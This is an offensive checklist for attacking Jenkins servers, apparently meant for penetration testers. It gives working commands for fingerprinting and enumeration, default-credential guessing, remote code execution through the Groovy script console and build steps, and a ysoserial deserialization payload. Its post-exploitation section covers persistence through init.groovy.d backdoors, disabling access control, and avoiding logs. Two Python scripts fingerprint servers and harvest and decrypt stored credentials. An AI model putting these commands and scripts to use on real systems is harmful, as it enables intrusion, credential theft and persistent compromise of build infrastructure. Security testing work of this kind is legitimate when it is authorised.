# Attacking Jenkins - Focused Commands & Key Points

## 1. Jenkins Version Detection:

```
curl -I http://<target>:8080/
```

* Jenkins stamps every response, including 403s, with `X-Jenkins: <version>` (plus a legacy `X-Hudson` header), so the version is readable without logging in. Two-part versions (`2.440`) are weekly releases, three-part ones (`2.426.3`) are LTS.

```
nmap -sV -p 8080 <target_ip>
```

* Nmap version detection. The service banner is the embedded Jetty; the Jenkins version itself comes from the HTTP headers above.

```
curl http://<target>:8080/jenkins/cli/ | grep -i "Jenkins CLI"
```

* `/cli/` documents the CLI transports and links the client jar (`/jnlpJars/jenkins-cli.jar`). Paths in this guide assume a `/jenkins/` context path; a standalone install serves from `/`, so drop the prefix if `/jenkins/` returns 404.

***

## 2. Jenkins Port Enumeration:

* Default Ports:
  * **8080** (HTTP web interface)
  * **50000** (inbound/JNLP agent port, often overlooked; configurable under Configure Global Security and may be disabled or set to a random port)

```
nmap -sV -p 50000 <target_ip>
```

* Identify the agent port. Agents connect here with the remoting protocol; the old remoting-based CLI, removed in Jenkins 2.165, used the same port, and some of the deserialization bugs in section 9 were reachable through it on the affected versions.

***

## 3. Jenkins CLI Enumeration:

```
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ -auth <user>:<api_token> help
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ -auth <user>:<api_token> list-plugins
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ -auth <user>:<api_token> list-jobs
```

* The client jar is served by the target itself at `/jnlpJars/jenkins-cli.jar`. `help` without `-auth` lists only the commands anonymous may run; `list-jobs` needs Overall/Read and `list-plugins` needs an admin-level account. User listing is not a CLI command; use `/people/api/json` (section 6) for that.

***

## 4. Jenkins Plugin Enumeration:

```
curl -u <user>:<api_token> http://<target>:8080/jenkins/pluginManager/api/json?depth=1
```

* Lists installed plugins with `shortName`, `version` and `enabled` fields to compare against the plugin advisories. The plugin manager is admin-only, so the bare `/pluginManager/` page returns 403 to anonymous. Plugins are a frequent vulnerability source and are updated separately from core, so old versions linger.

***

## 5. Jenkins Security Realm Enumeration:

```
curl -s http://<target>:8080/jenkins/login | grep -iE 'signup|j_username|saml|oauth|github'
curl -u <user>:<api_token> http://<target>:8080/jenkins/configureSecurity/
```

* The login page is unauthenticated: a `j_username` form means the built-in user database or an LDAP/AD realm behind it, a `/signup` link means self-registration is enabled (register your own account), and a redirect or SSO button names the external realm (SAML, GitHub, OIDC). The full realm configuration on `/configureSecurity/` is Overall/Administer only.

***

## 6. Jenkins API Enumeration:

```
curl http://<target>:8080/jenkins/api/
curl 'http://<target>:8080/jenkins/api/json?pretty=true&tree=jobs[name,url,color],views[name]'
curl http://<target>:8080/jenkins/people/api/json
```

* `/api/` is the HTML description of the remote API; every object Jenkins renders has `/api/json` and `/api/xml` siblings (`/job/<name>/api/json`, `/computer/api/json` for agents, `/queue/api/json`). `tree=` limits the fields and `depth=` expands nested objects; `/people/api/json` lists known user accounts for password guessing. Anonymous access to any of these means "Allow anonymous read" or a wide-open authorization strategy.

***

## 7. Jenkins Access Control Enumeration:

```
curl -s -o /dev/null -w '%{http_code}\n' http://<target>:8080/jenkins/api/json
curl -s -o /dev/null -w '%{http_code}\n' http://<target>:8080/jenkins/script
curl -u <user>:<api_token> http://<target>:8080/jenkins/configureSecurity/
```

* Read the strategy off the status codes rather than the admin-only `/configureSecurity/` page: anonymous 200 on `/api/json` means anonymous has Overall/Read; anonymous 200 on `/script` means "Anyone can do anything" (`AuthorizationStrategy$Unsecured`) and section 8 applies with no credentials at all. With a low-privileged account, check `/job/<name>/configure` (Job/Configure gives RCE through a build step) and `/script` (Overall/Administer). A 403 from Jenkins carries `X-Required-Permission`, which names exactly what you lack.
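The checks in sections 1, 5, 6 and 7 reduce to a few unauthenticated requests. The following script is an added example, not code from the original page or from the Jenkins project: it reads the version headers, classifies the `/api/json` status code and asks `/whoAmI/api/json` (an unprotected action, reachable even when `/api/json` is 403) what identity the server assigned. The target URL is a placeholder; the sample header values and JSON used to exercise the parsers are constructed.

```python
"""Unauthenticated Jenkins fingerprint: version headers, anonymous-read check via
/api/json, identity via /whoAmI/api/json. Added example; not Jenkins project code."""
import json
import urllib.error
import urllib.request
from typing import Dict, Optional, Tuple

# Headers Jenkins itself sets. X-Jenkins-CLI-Port only exists on old releases with
# the remoting CLI, X-SSH-Endpoint only when the SSH server is enabled.
VERSION_HEADERS = ("X-Jenkins", "X-Hudson")
INTEREST_HEADERS = ("X-Jenkins-Session", "X-SSH-Endpoint", "X-Jenkins-CLI-Port",
                    "X-Required-Permission", "X-You-Are-Authenticated-As")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.426.3' -> (2, 426, 3); '2.440' -> (2, 440). Weekly releases have two
    components, LTS three; a non-numeric suffix on a component is dropped."""
    out = []
    for part in text.strip().split("."):
        digits = "".join(ch for ch in part if ch.isdigit())
        if not digits:
            break
        out.append(int(digits))
    return tuple(out)


def header_facts(headers: Dict[str, str]) -> Dict[str, str]:
    """Pick the Jenkins-specific headers out of any response, 200 or 403."""
    lower = {k.lower(): v for k, v in headers.items()}
    return {name: lower[name.lower()] for name in VERSION_HEADERS + INTEREST_HEADERS
            if name.lower() in lower}


def anonymous_read(status: int) -> Optional[bool]:
    """/api/json: 200 means anonymous holds Overall/Read, 403 means Jenkins wants a
    login (it answers 403, not 401, and names the permission in
    X-Required-Permission). Anything else is most likely a wrong context path."""
    if status == 200:
        return True
    if status == 403:
        return False
    return None


def whoami_facts(body: str) -> Dict[str, object]:
    """/whoAmI/api/json reports the identity Jenkins assigned to this request."""
    data = json.loads(body)
    return {"name": data.get("name"), "anonymous": data.get("anonymous"),
            "authorities": data.get("authorities", [])}


def fetch(url: str):
    """GET returning (status, headers, body) for 4xx responses as well."""
    req = urllib.request.Request(url, headers={"User-Agent": "jenkins-fp"})
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status, dict(r.headers), r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read().decode("utf-8", "replace")


def fingerprint(base: str) -> Dict[str, object]:
    """base is e.g. http://target:8080/jenkins (placeholder)."""
    base = base.rstrip("/")
    status, headers, _ = fetch(base + "/api/json")
    report: Dict[str, object] = dict(header_facts(headers))
    report["anonymous_read"] = anonymous_read(status)
    if "X-Jenkins" in report:
        report["version"] = parse_version(str(report["X-Jenkins"]))
    st, _, body = fetch(base + "/whoAmI/api/json")
    if st == 200:
        report.update(whoami_facts(body))
    return report


if __name__ == "__main__":
    import sys
    print(json.dumps(fingerprint(sys.argv[1]), indent=2, default=str))
```

A `version` with an `anonymous_read` of `False` still tells you the exact release to check against the advisories, and `X-Required-Permission` on the 403 tells you which permission a guessed or registered account would need.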

***

## 8. Jenkins Exploitation:

* **Exploiting Weak Credentials**
  * Check for default and reused credentials (`admin:admin`, `admin:password`) against the user names from `/people/api/json`.

```
msf6 > use auxiliary/scanner/http/jenkins_login
msf6 auxiliary(scanner/http/jenkins_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/jenkins_login) > set TARGETURI /jenkins/
msf6 auxiliary(scanner/http/jenkins_login) > run
```

* **Exploiting Script Console (Authenticated RCE)**

```
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ -auth <user>:<api_token> groovysh
println "id".execute().text
curl -u <user>:<api_token> -d 'script=println "id".execute().text' http://<target>:8080/jenkins/scriptText
```

* Requires Overall/Administer (which implies RunScripts). The same Groovy runs interactively in the web console at `/script` or non-interactively against `/scriptText`, and executes as the Jenkins service user on the controller. `"id".execute()` starts the process directly; for shell syntax use `["/bin/sh", "-c", "<cmd>"].execute().text`. An API token over basic auth is exempt from the CSRF crumb; a password is not.
* **Exploiting Build Job Execution**

```
curl -u <user>:<api_token> -X POST http://<target>:8080/jenkins/job/<job>/build
curl -u <user>:<api_token> http://<target>:8080/jenkins/job/<job>/lastBuild/consoleText
```

* Triggering a build needs Job/Build and returns `201` with the queue item in `Location`; the output lands in `lastBuild/consoleText`. It only becomes RCE when you can also change what the job runs: with Job/Configure, add an "Execute shell" build step (or edit a Pipeline's `sh` step) on an existing job; with Job/Create, POST a freestyle `config.xml` to `/createItem?name=<job>`. Builds run as the Jenkins user on the controller or on an agent, with the job's credentials in the environment either way. Password-authenticated POSTs need a crumb from `/crumbIssuer/api/json`, which since 2.176.2 is bound to the session cookie that fetched it.

***

## 9. Jenkins Deserialization Vulnerabilities:

* Jenkins has had several Java deserialization RCEs: CVE-2015-8103 (CLI over the agent port, commons-collections gadget), CVE-2016-0792 (XStream on `/createItem`) and CVE-2017-1000353 (CLI over HTTP). All are fixed in current releases, so confirm the version from section 1 before spending time here. Use **ysoserial** to generate payloads:

```
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/pwned" | base64
```

* The argument is the command the gadget chain runs; pick a chain whose classes exist on the target's classpath (the affected releases bundled commons-collections 3.x). Deliver the serialized object to the endpoint the specific CVE describes; public exploits exist for all three.

***

## 10. Jenkins Post-Exploitation & Persistence:

* **Extract Credentials from `credentials.xml`**

```
cat /var/lib/jenkins/credentials.xml
cat /var/lib/jenkins/secrets/master.key /var/lib/jenkins/secrets/hudson.util.Secret
```

* `/var/lib/jenkins` is the package default for `JENKINS_HOME`; check the `JENKINS_HOME` variable in `/proc/<pid>/environ` if it differs. Secret fields look like `{AQAAABAAAA...}` and are AES-encrypted with a key held in `secrets/hudson.util.Secret`, itself encrypted with `secrets/master.key`; take both files to decrypt offline, or, with script console access, decrypt in place with `println(hudson.util.Secret.decrypt("{AQAAABAAAA...}").getPlainText())`. More secrets live in `users/*/config.xml` (API tokens) and `jobs/*/config.xml`, and anything injected into a build is readable from that build's environment.

* **Establish Persistence:**

```
cp backdoor.groovy /var/lib/jenkins/init.groovy.d/
```

* Jenkins does not serve JSP, so a web shell dropped into `jobs/` does nothing. Every `*.groovy` in `init.groovy.d/` runs as SYSTEM at each startup, which is enough to re-add an admin user, reopen the authorization strategy or spawn a reverse shell. Quieter alternatives: a freestyle job with a `TimerTrigger` cron spec and an "Execute shell" step, or an extra user under `users/` with an API token you control.

* **Modify Access Control for Future Access:**

```
Jenkins.instance.setAuthorizationStrategy(new hudson.security.AuthorizationStrategy.Unsecured())
Jenkins.instance.save()
```

* Script-console Groovy that switches to "Anyone can do anything". The same change in `config.xml` is `<authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>` (the class lives in `hudson.security`, not `jenkins.security`) and takes effect after a restart or `/reload`. It is loud: the whole instance becomes anonymous RCE, so prefer adding one user to the existing strategy unless noise is acceptable.
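The credential harvest above, automated: an added example, not code from the original page or from Jenkins. It walks any Jenkins XML (`credentials.xml`, `users/*/config.xml`, `jobs/*/config.xml`) for `{base64}`-format secret fields, attributes each to the nearest enclosing `<id>`, and emits a Groovy script that decrypts them with `hudson.util.Secret` on the controller, where the key lives; run that script in `/script` or with `java -jar jenkins-cli.jar ... groovy = < decrypt.groovy`. `SAMPLE` is a constructed `credentials.xml` with fake ciphertext; the ids and the plugin class names it uses are illustrative.

```python
"""Pull encrypted secrets out of Jenkins XML and emit Groovy that decrypts them on
the controller with hudson.util.Secret. Added example; not Jenkins project code.
SAMPLE is a constructed credentials.xml whose ciphertext blobs are fake."""
import re
import sys
import xml.etree.ElementTree as ET
from typing import List, Tuple

# New-format Secret ciphertext is {base64}; plain PEM keys or hashes do not match.
ENC_RE = re.compile(r"^\{[A-Za-z0-9+/=]+\}$")
# Element names the credentials, ssh-credentials and plain-credentials plugins
# (and the legacy per-user API token) store as hudson.util.Secret.
SECRET_TAGS = {"password", "privateKey", "secret", "passphrase", "apiToken"}

SAMPLE = """<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider>
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          <scope>GLOBAL</scope>
          <id>deploy-user</id>
          <username>deploy</username>
          <password>{AQAAABAAAAAQZmFrZS1jaXBoZXJ0ZXh0LW5vdC1yZWFs=}</password>
        </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
        <com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
          <id>git-key</id>
          <username>git</username>
          <passphrase>{AQAAABAAAAAQYW5vdGhlci1mYWtlLWJsb2I=}</passphrase>
          <privateKeySource class="com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey$DirectEntryPrivateKeySource">
            <privateKey>{AQAAABAAAAAwdGhpcmQtZmFrZS1ibG9i}</privateKey>
          </privateKeySource>
        </com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
"""


def find_secrets(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (owning credential id, element name, ciphertext) for every encrypted
    value. The id comes from the nearest ancestor with an <id> child, because
    privateKey sits one level down inside privateKeySource."""
    root = ET.fromstring(xml_text)
    parent = {child: el for el in root.iter() for child in el}

    def owner(el) -> str:
        while el is not None:
            ident = el.findtext("id")
            if ident:
                return ident
            el = parent.get(el)
        return root.tag

    found = []
    for el in root.iter():
        if el.tag in SECRET_TAGS and el.text and ENC_RE.match(el.text.strip()):
            found.append((owner(parent.get(el)), el.tag, el.text.strip()))
    return found


def gq(s: str) -> str:
    """Groovy single-quoted literal (no $ interpolation)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def groovy_decrypt(secrets: List[Tuple[str, str, str]]) -> str:
    """Script for /script (or `jenkins-cli groovy =`) printing each value in clear.
    Secret.decrypt returns null for blobs this instance's key cannot open."""
    rows = ",\n".join("    [%s, %s, %s]" % (gq(i), gq(t), gq(c)) for i, t, c in secrets)
    return "\n".join([
        "def found = [",
        rows,
        "]",
        "found.each { row ->",
        "    def (id, tag, enc) = row",
        "    def s = hudson.util.Secret.decrypt(enc)",
        "    println(id + ' ' + tag + ': ' + (s == null ? '<not decryptable here>' : s.getPlainText()))",
        "}",
    ])


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    print(groovy_decrypt(find_secrets(text)))
```

Decrypting on the controller avoids carrying `master.key` and `hudson.util.Secret` off the box, but every `/script` call is logged; for a quiet assessment, copy the three files and decrypt offline instead.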

***

### **Key Takeaways:**

* **Script Console**: Overall/Administer is RCE on the controller via `/script`, `/scriptText` or the CLI `groovysh`.
* **Weak Credentials**: Default or weak credentials are common, and user names are enumerable through the API.
* **Plugin Enumeration**: Plugins are a frequent source of vulnerabilities and lag behind core in patching.
* **Jenkins API Exposure**: Anonymous read leaks jobs, agents, users and build logs.
* **Access Control Issues**: Job/Configure or Job/Create is RCE through build steps; `Unsecured` is anonymous RCE.
* **Deserialization Attacks**: Version-gated; only releases predating the 2015-2017 CLI and XStream fixes are affected.
* **Persistence and Secrets**: `init.groovy.d` scripts, cron-triggered jobs or a planted user; stored credentials decrypt with `hudson.util.Secret`.

Use this as a checklist: fingerprint, enumerate what anonymous and low-privileged accounts can reach, then escalate through the script console or build steps and pull the credential store.
